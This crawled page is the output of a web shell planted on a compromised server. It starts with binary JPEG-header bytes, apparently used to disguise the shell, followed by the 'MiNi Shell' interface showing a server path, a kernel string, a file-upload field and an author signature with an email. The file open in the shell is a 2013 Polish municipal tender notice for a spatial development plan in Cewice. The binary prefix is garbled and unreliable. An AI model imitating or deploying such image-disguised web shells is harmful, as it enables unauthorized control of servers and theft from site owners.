JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131118/468456-N-2013.html

<p class="kh_header"><b>Cewice: Opracowanie projektu miejscowego planu zagospodarowania przestrzennego m. Cewice w gminie Cewice zgodnie z Uchwałą nr XXIX-267-2013 Rady Gminy Cewice z dnia 13 sierpnia 2013 r</b><br>
<b>Numer ogłoszenia: 468456 - 2013; data zamieszczenia: 18.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Cewice z siedzibą organu wykonawczego gminy , ul. W. Witosa 16, 84-312 Cewice, woj. pomorskie, tel. 059 8613460, faks 059 8613462.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.cewice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu miejscowego planu zagospodarowania przestrzennego m. Cewice w gminie Cewice zgodnie z Uchwałą nr XXIX-267-2013 Rady Gminy Cewice z dnia 13 sierpnia 2013 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie projektu miejscowego planu zagospodarowania przestrzennego m. Cewice w gminie Cewice zgodnie z Uchwałą nr XXIX-267-2013 Rady Gminy Cewice z dnia 13 sierpnia 2013 r.
a)Obszar i granice opracowania: zgodnie z załącznikiem do uchwały nr XXIX-267-2013 Rady Gminy Cewice z dnia 13 sierpnia 2013 r.
2.Zakres przedmiotu zamówienia obejmuje:
1.Przedmiot zamówienia dotyczący planu zagospodarowania przestrzennego powinien być wykonany zgodnie z obowiązującymi przepisami z uwzględnieniem wymogów określonych w rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164 poz. 1587) oraz ustawie z dnia 27 marca 2003r. o planowaniu zagospodarowaniu przestrzennym (Dz.U. z 2012 r. poz. 647 ze zmianami)
2.W ramach przedmiotu zamówienia Wykonawca wykona:
a)koncepcję projektu planu do akceptacji Zamawiającego,
b)dokumentację formalno - prawną prac nad projektem planu,
c)opracowania graficzne informacji planistycznych stanowiących zasób materiałów wyjściowych i analiz,
d)opracowanie ekofizjograficzne
e)opracowanie prognozy oddziaływania na środowisko
f)opracowanie prognozy skutków finansowych uchwalenia projektu planu
g)analizę konieczności opracowania wniosków o zmianę przeznaczenia gruntów rolnych i leśnych
h)analizę uwag dotyczących projektu planu oraz przygotowanie stanowiska Wójta Gminy dotyczącego ich uwzględnienia lub nieuwzględnienia,
i)inwentaryzację urbanistyczną - prace terenowe wizja terenowa zainwestowania uzbrojenia terenu oraz elementów przyrodniczych,
j)przygotowanie merytoryczne dokumentów formalno-prawnych, projekty pism zgodnie z art. 17 ustawy o planowaniu i zagospodarowaniu przestrzennym, 
k)ogłoszenia, obwieszczenia, wykazy zestawienia, wystąpienia, uchwały i współpracę przy prowadzeniu procedury oraz dokumentacji prac planistycznych,
l)prezentację projektu planu  i uczestnictwo w publicznej dyskusji na temat przyjętych w projekcie rozwiązań; prezentację planu podczas posiedzeń komisji Rady Gminy i Gminnej Komisji Urbanistycznej, prezentacji planu podczas sesji Rady Gminy.
m)uzyskanie akceptacji Zamawiającego dla przyjętych rozwiązań po zakończeniu każdego z etapów prac planistycznych,
n)uzyskanie wymaganych przepisami prawa uzgodnień i opinii wraz z przygotowaniem projektów pism do instytucji i organów opiniujących i uzgadniających projekt planu,
o)analizę otrzymanych opinii i uzgodnień wraz z przygotowaniem wykazu opinii oraz wprowadzeniem zmian wynikłych z uzyskanych opinii i uzgodnień, ewentualne wdrożenie ponownej procedury opiniowania i uzgadniania,
p)przygotowanie dokumentów związanych z wyłożeniem projektu planu do publicznego wglądu, uczestniczenie i udzielanie niezbędnych wyjaśnień w dyskusji publicznej nad przyjętymi w planie rozwiązaniami oraz sporządzenie protokołu z tej dyskusji
q)analizę złożonych uwag do wyłożonego planu, sporządzenie wykazu  wraz z pisemnym stanowiskiem dotyczącym ich uwzględnienia lub nieuwzględnienia,
r)wprowadzenie zmian do planu wynikających z uwzględnienia wniesionych uwag, a następnie w niezbędnym zakresie ponowienie uzgodnień
s)przedłożenie Radzie Gminy Cewice planu po zmianach wynikających z uwzględnionych uwag - projekt uchwały wraz z załącznikami,
t)przygotowanie kompletu dokumentacji formalno-prawnej dla Wojewody Pomorskiego w celu sprawdzenia zgodności z prawem Uchwały Rady Gminy wraz z załącznikami
u)udział w czynnościach niezbędnych do ewentualnego doprowadzenia planu do zgodności z przepisami prawa, w sytuacji stwierdzenia nieważności uchwały przez Wojewodę.
Wszelkie prace projektowe lub czynności nie opisane powyżej, a wynikające z procedur określonych w ustawie oraz przepisach szczególnych, niezbędne do właściwego i kompletnego opracowania zamówienia Wykonawca winien wykonać w ramach przedmiotu zamówienia i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.
Do czasu stwierdzenia przez Wojewodę Pomorskiego zgodności planu z przepisami prawnymi, wszystkie czynności związane z obowiązkiem opracowania planu należą do wykonawcy.
3.Kompletne opracowanie, stanowiące przedmiot odbioru, które Wykonawca przekaże Zamawiającemu składać się będzie z następujących opracowań:
a)z tekstu MPZP w 4 egz. w wersji drukowanej wraz z pomniejszonymi rysunkami, 2 kompletów rysunków MPZP w skali 1:2000 w kolorze, 
b)z rysunków i tekstu w wersji elektronicznej na płycie CD/DVD w 2 egz., w formacie ustalonym przez Zamawiającego (pdf., jpg., i in.),
c)z części graficznej w wersji elektronicznej w postaci wektorowej bazy danych przestrzennych zgodnej ze standardem GIS
d)z teczek dokumentów formalno - prawnych i materiałów związanych ze sporządzeniem Planu - 2 egz., 
e)z opracowania ekofizjograficznego - 2 egz. + 1 egz. na płycie CD/DVD, 
f)z prognozy oddziaływania na środowisko - 2 egz. + 1 egz. na płycie CD/DVD, 
g)z prognozy skutków finansowych - 2 egz. + 1 egz. na płycie CD/DVD,
h)z zestawienia powierzchni działek objętych planem z określeniem ich przeznaczenia wg poniższej tabeli:
3.W celu prawidłowego sporządzenia oferty zaleca się przeprowadzenie przez Wykonawców wizji lokalnej w celu uzyskania wszystkich niezbędnych informacji, co do ryzyka, trudności i wszelkich innych okoliczności, jakie mogą wystąpić w trakcie realizacji zamówienia. Koszt wizji lokalnej ponosi Wykonawca.
4.Wykonawca pozyska we własnym zakresie i na własny koszt materiały geodezyjne i kartograficzne niezbędne  do opracowania projektu
5.Powierzchnia planu do opracowania wynosi w przybliżeniu około 531 ha.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Ocena spełniania warunku na podstawie oświadczenia z art. 22 ust 1 w zw. z art. 44 ustawy na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał doświadczenie w zrealizowaniu w ciągu ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie zamówień polegających na wykonaniu co najmniej 3 miejscowych planów zagospodarowania przestrzennego, uchwalonych w procedurze ustawy z dnia 2003-03-27 o planowaniu i zagospodarowaniu przestrzennym o wartości min 30 000,00 zł brutto każdy. Ocena spełniania warunku na podstawie dokumentów lub oświadczeń złożonych wraz z ofertą na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Ocena spełniania warunku na podstawie oświadczenia z art. 22 ust 1 w zw. z art. 44 ustawy na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca udowodnił dysponowanie co najmniej 1 osobą  posiadającą kwalifikacje urbanistyczne do wykonywania mpzp zgodnie z ustawą z 2000-12-15 o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r., nr 5, poz 42 ze zmianami). 
Ocena spełniania warunku na podstawie dokumentów lub oświadczeń złożonych wraz z ofertą na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Ocena spełniania warunku na podstawie oświadczenia z art. 22 ust 1 w zw. z art. 44 ustawy na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie głównych usług Wykonawca powinien wykazać wykonanie co najmniej 3 usług opracowania mpzp, uchwalonych w procedurze ustawy z dnia 2003-03-27 o planowaniu przestrzennym o wartości minimalnej 30 000,00 zł brutto każda.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca wykazując spełnianie warunków posiadania doświadczenia oraz osób zdolnych do wykonania zamówienia, polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków winien udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia lub inny dokument potwierdzający ten fakt. 

W stosunku do Wykonawców zagranicznych wymaga się złożenia powyższych dokumentów w języku polskim lub z tłumaczeniem na język polski poświadczonym za zgodność z oryginałem przez Wykonawcę.
Zamawiający wymaga, aby żądane przez niego dokumenty lub oświadczenia zostały złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Dokumenty sporządzone w języku obcym powinny zostać złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 



Jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, zgodnie z art. 23 w związku z art. 141 ustawy PZP Zamawiający żąda aby:
1)dokumenty wymagane odnośnie potwierdzenia spełniania warunków udziału w postępowaniu wymienionych w art. 22 ust 1 ustawy zostały złożone wspólnie przez Wykonawców, zaś odnośnie spełniania warunku niepodlegania wykluczeniu z postępowania na podstawie art. 24 ust 1 ustawy osobno przez każdego Wykonawcę;
2)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, winni oni ustanowić Pełnomocnika do reprezentowania ich w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia. Załączone Pełnomocnictwo powinno zawierać: jednoznaczne określenie postępowania, do którego się odnosi i precyzować zakres umocowania; wymieniać wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia i zawierać podpisy każdego z nich;
3)wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem;

Każda oferta musi zawierać:
a)formularz oferty 
b)oświadczenie z art. 22 ust. 1 ustawy ;
c)oświadczenie z art. 24 ust. 1 ustawy 
d)oświadczenie o przynależności do grupy kapitałowej i lista podmiotów należących do tej samej grupy kapitałowej (jeżeli dotyczy)
e)stosowne pełnomocnictwa w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z dokumentów dołączonych do oferty;
f)w przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia dokument ustanawiający Pełnomocnika do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego;
g)wykaz wykonanych usług 
h)wykaz osób uczestniczących w realizacji zamówienia 
i)oświadczenie Wykonawcy, iż osoby biorące udział w realizacji zamówienia posiadają wymagane kwalifikacje do wykonania przedmiotu zamówienia, jeżeli ustawy nakładają obowiązek ich posiadania
j)wykaz części zamówienia, których wykonanie zostanie powierzone podwykonawcy 
k)zobowiązanie podmiotu trzeciego do oddania swoich zasobów do dyspozycji - jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej z Wykonawcą umowy, o której mowa w art. 144 ustawy Prawo zamówień publicznych, w zakresie przedłużenia terminu wykonania przedmiotu umowy w stosunku do terminu określonego w § 4 o czas opóźnienia,                       w następujących przypadkach: 
a)zmiany strony umowy w razie wystąpienia zdarzeń losowych takich, jak: śmierć Wykonawcy - 	dotyczy Wykonawcy będącego osobą fizyczną prowadzącą działalność gospodarczą,
b)wystąpienia konieczności powtórzenia prac lub czynności z przyczyn proceduralnych 	niezależnych od Wykonawcy,
c)realizacja przedmiotu umowy wymaga uzyskania stosownych uzgodnień i opinii z właściwych organów, a z przyczyn niezależnych od stron niemożliwe było uzyskanie tych uzgodnień i opinii w terminach przewidzianych w przepisach prawa. Warunkiem dokonania zmiany jest udokumentowanie zasadności dokonania zmiany, poprzez przedstawienie dokumentów potwierdzających opóźnienie w wydaniu uzgodnień lub opinii przez właściwe organy, 
d)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
e)zaistnienie innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, a skutkująca brakiem możliwości wykonania umowy.

2.Warunki zmian:
a)inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego 
b)uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, 
c)forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.cewice.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY UL. W. WITOSA 16 84-312 CEWICE POKÓJ NR 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2013 godzina 11:00, miejsce: URZĄD GMINY UL. W. WITOSA 16 84-312 CEWICE POKÓJ NR 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com